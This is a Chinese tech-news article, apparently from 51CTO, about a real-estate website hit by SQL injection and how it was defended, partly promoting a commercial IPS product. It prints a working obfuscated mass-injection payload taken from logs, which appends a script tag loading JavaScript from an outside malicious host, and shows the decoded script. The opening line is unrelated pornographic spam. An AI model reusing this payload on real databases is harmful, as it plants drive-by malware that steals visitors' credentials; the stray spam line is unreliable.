自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

網(wǎng)站SQL注入防御實戰(zhàn)演示經(jīng)典版!

安全
軟件破壞 網(wǎng)站SQL注入防御的實際操作是本文所要描述的主要內容,下面就是文章的主要內容的詳細解析,望大家會對其有更好的了解。

以下的文章主要向大家描述的是軟件破壞 網(wǎng)站SQL注入防御的實際操作,SQL注入可以稱之為作為直接威脅web業(yè)務的最嚴重攻擊行為之一,已經(jīng)很多網(wǎng)站管理員所了解,這種通過HTTP標準端口,利用網(wǎng)頁編碼不嚴謹。

提交精心構造的代碼實現(xiàn)對數(shù)據(jù)庫非授權訪問的攻擊方法,已經(jīng)被越來越多的scriptguy(腳本小子)成功掌握并廣泛實踐。

SQL注入作為直接威脅web業(yè)務的最嚴重攻擊行為,已經(jīng)被大多數(shù)的網(wǎng)站管理員所了解,這種通過HTTP標準端口,利用網(wǎng)頁編碼不嚴謹,提交精心構造的代碼實現(xiàn)對數(shù)據(jù)庫非授權訪問的攻擊方法,已經(jīng)被越來越多的scriptguy(腳本小子)成功掌握并廣泛實踐。沒錯,他們可能并不知道SQL注入的原理,不知道ASP,不知道PHP,但他們有工具,全自動的,完善的,高效率的工具,這些工具使得任何一個有簡單網(wǎng)絡知識的中學學生可以很容易的拿到某個政府網(wǎng)站的最高管理員權限,而且做這些事情并不會比你在周六的中午下樓去買一聽可樂要更困難。

而隨著互聯(lián)網(wǎng)黑色產(chǎn)業(yè)鏈的浮出水面,駭客們發(fā)現(xiàn)攻擊網(wǎng)站不僅僅可以用作向朋友炫耀的資本,還可以作為購買游戲點卡或者是數(shù)碼相機的資金來源:在被攻擊的網(wǎng)站嵌入腳本木馬,可以輕易盜竊那些訪問了受攻擊網(wǎng)站,但個人PC安全防護措施不全面用戶的私密信息,比如游戲賬號密碼,或者是銀行賬號密碼。

經(jīng)常使用google的用戶一定對這段話不陌生“該網(wǎng)站可能含有惡意軟件,有可能會危害您的電腦”,這意味著這個網(wǎng)站也許已經(jīng)遭遇掛馬黑手,成為駭客們的眾多取款點之一。本文就一例真實案例,來介紹一下網(wǎng)站的安全防護。

某市房地產(chǎn)網(wǎng)站的管理員小李剛上班就被叫到領導辦公室去了,因為網(wǎng)站帶上了google小尾巴:“該網(wǎng)站可能含有惡意軟件,有可能會危害您的電腦”,購房者看到這一提示信息,紛紛給該市房產(chǎn)管理局打電話,于是就有了上面的一幕。回到座位上的小李一籌莫展:網(wǎng)站服務器已經(jīng)全盤殺毒好幾次了,沒有發(fā)現(xiàn)病毒存在的痕跡,看來只能找專業(yè)安全廠商解決了。

小李選擇的是國內著名的一家網(wǎng)絡安全公司,在向該安全公司提交web日志的第二天,小李就收到了回信,從日志的分析結果中,可以清楚的看到駭客的攻擊走向:這是一次非常典型的SQL注入攻擊,首先使用dEcLaRe建立游標,遍歷數(shù)據(jù)庫中所有允許寫入字符串的相關字段,并通過執(zhí)行exec操作,使用update語句替換了網(wǎng)站頁面的正常文件,插入了如下一段十六進制字符:

 

  1. exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']  
  2. =rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D68  
  3. 7474703A2F2F732E736565392E75732F732E6A733E3C2F7363  
  4. 726970743E3C212D2D%20aS%20vArChAr(67))')%20f  

 

經(jīng)過解密,可以得到如下字符串

 

  1. "][/title][script src=http://s.see9.us/s.js][/script][!— 

這里面的http://s.see9.us/s.js就是導致網(wǎng)站帶有小尾巴的罪魁禍首。

經(jīng)過一天的奮力工作,網(wǎng)頁中所有的小尾巴都清理干凈了,在安全工程師的建議下,小李還向StopBadware.org 申請了重新的索引,并向google提交了審核申請。做完了這些之后,小李又一次陷入了困擾:如何防范網(wǎng)站再次遭受SQL注入攻擊呢?

網(wǎng)絡上提供了一些代碼修改級的防御方法,可是需要對每一個頁面都做仔細的檢查,看著自己所負責網(wǎng)站的10000余個頁面,小李只能是苦笑,聯(lián)想起2007年夏天那次微軟英國網(wǎng)站被SQL注入的案例,小李在內心否認了徹底檢查一遍頁面代碼的做法。關鍵時刻,又是安全工程師提出了建議:部署天清入侵防御產(chǎn)品,利用天清IPS的基于注入攻擊手法的檢測原理,可以對各種SQL注入攻擊的變種進行防御。

和傳統(tǒng)的SQL注入防御方法不一樣的是,天清入侵防御產(chǎn)品可以獨立部署,不需要對被保護的web系統(tǒng)做任何修改,而且和那些基于特征的檢測方法不一樣的是,天清IPS采用的VSID算法關注的是攻擊手法而非攻擊代碼,其檢測準確率有很大改善。

在部署了入侵防御產(chǎn)品的當天晚上,小李就在入侵防御產(chǎn)品的控制中心看到了發(fā)現(xiàn)了SQL注入攻擊并被阻斷的報警信息,而網(wǎng)站安然無恙。

友情提示:對于防御SQL注入攻擊,檢查網(wǎng)頁代碼是必要的,駭客獲得網(wǎng)站權限,并不僅僅為了炫耀,可能還會有更骯臟的目的;其次,你需要做的事是挽回名譽損失,畢竟掛上google小尾巴不是件光榮的事;最后,你絕對不能忘記的事還有修補漏洞,在沒有“打掃”干凈你的系統(tǒng)前,駭客進出你的網(wǎng)絡將會像喝下午茶一樣簡單。

你可以選擇修改源代碼來過濾關鍵字(記住不要矯枉過正,筆者就見過不允許用戶名叫select/and等SQL關鍵字的網(wǎng)站),或者是你也可以選擇使用專業(yè)的IPS產(chǎn)品。上述的相關內容就是對警惕惡意軟件破壞 網(wǎng)站SQL注入防御實戰(zhàn)的描述,希望會給你帶來一些幫助在此方面。

【編輯推薦】

  1. 心情墻插件SQL注入及XSS漏洞分析和修復
  2. 新手入門:防范SQL注入攻擊的新辦法
  3. 對JSP防范SQL注入攻擊的描述
  4. Web下SQL注入攻擊的檢測與防御
  5. 解析阻止或減輕SQL注入攻擊實用招數(shù)

 

責任編輯:佚名 來源: aa25.cn
相關推薦

2019-02-22 09:00:00

2013-05-22 17:43:21

2023-12-01 16:21:42

2017-05-05 11:31:34

2010-10-25 12:10:39

SQL注入

2010-09-08 13:10:03

2014-01-17 12:35:48

2017-05-08 14:33:51

2018-02-10 09:44:19

2010-07-05 10:06:51

SQL Server擴

2010-06-18 10:25:49

SQL Server

2010-07-09 11:34:51

SQL Server用

2010-07-05 12:09:16

SQL Server

2014-07-09 15:41:51

2009-03-14 16:50:38

網(wǎng)站安全meter程序

2010-03-02 13:43:01

WCF事務演示

2010-05-27 18:30:56

MySQL 命令行導入

2010-07-14 09:41:26

SQL Server數(shù)

2019-04-08 18:23:31

2010-12-20 16:04:30

點贊
收藏

51CTO技術棧公眾號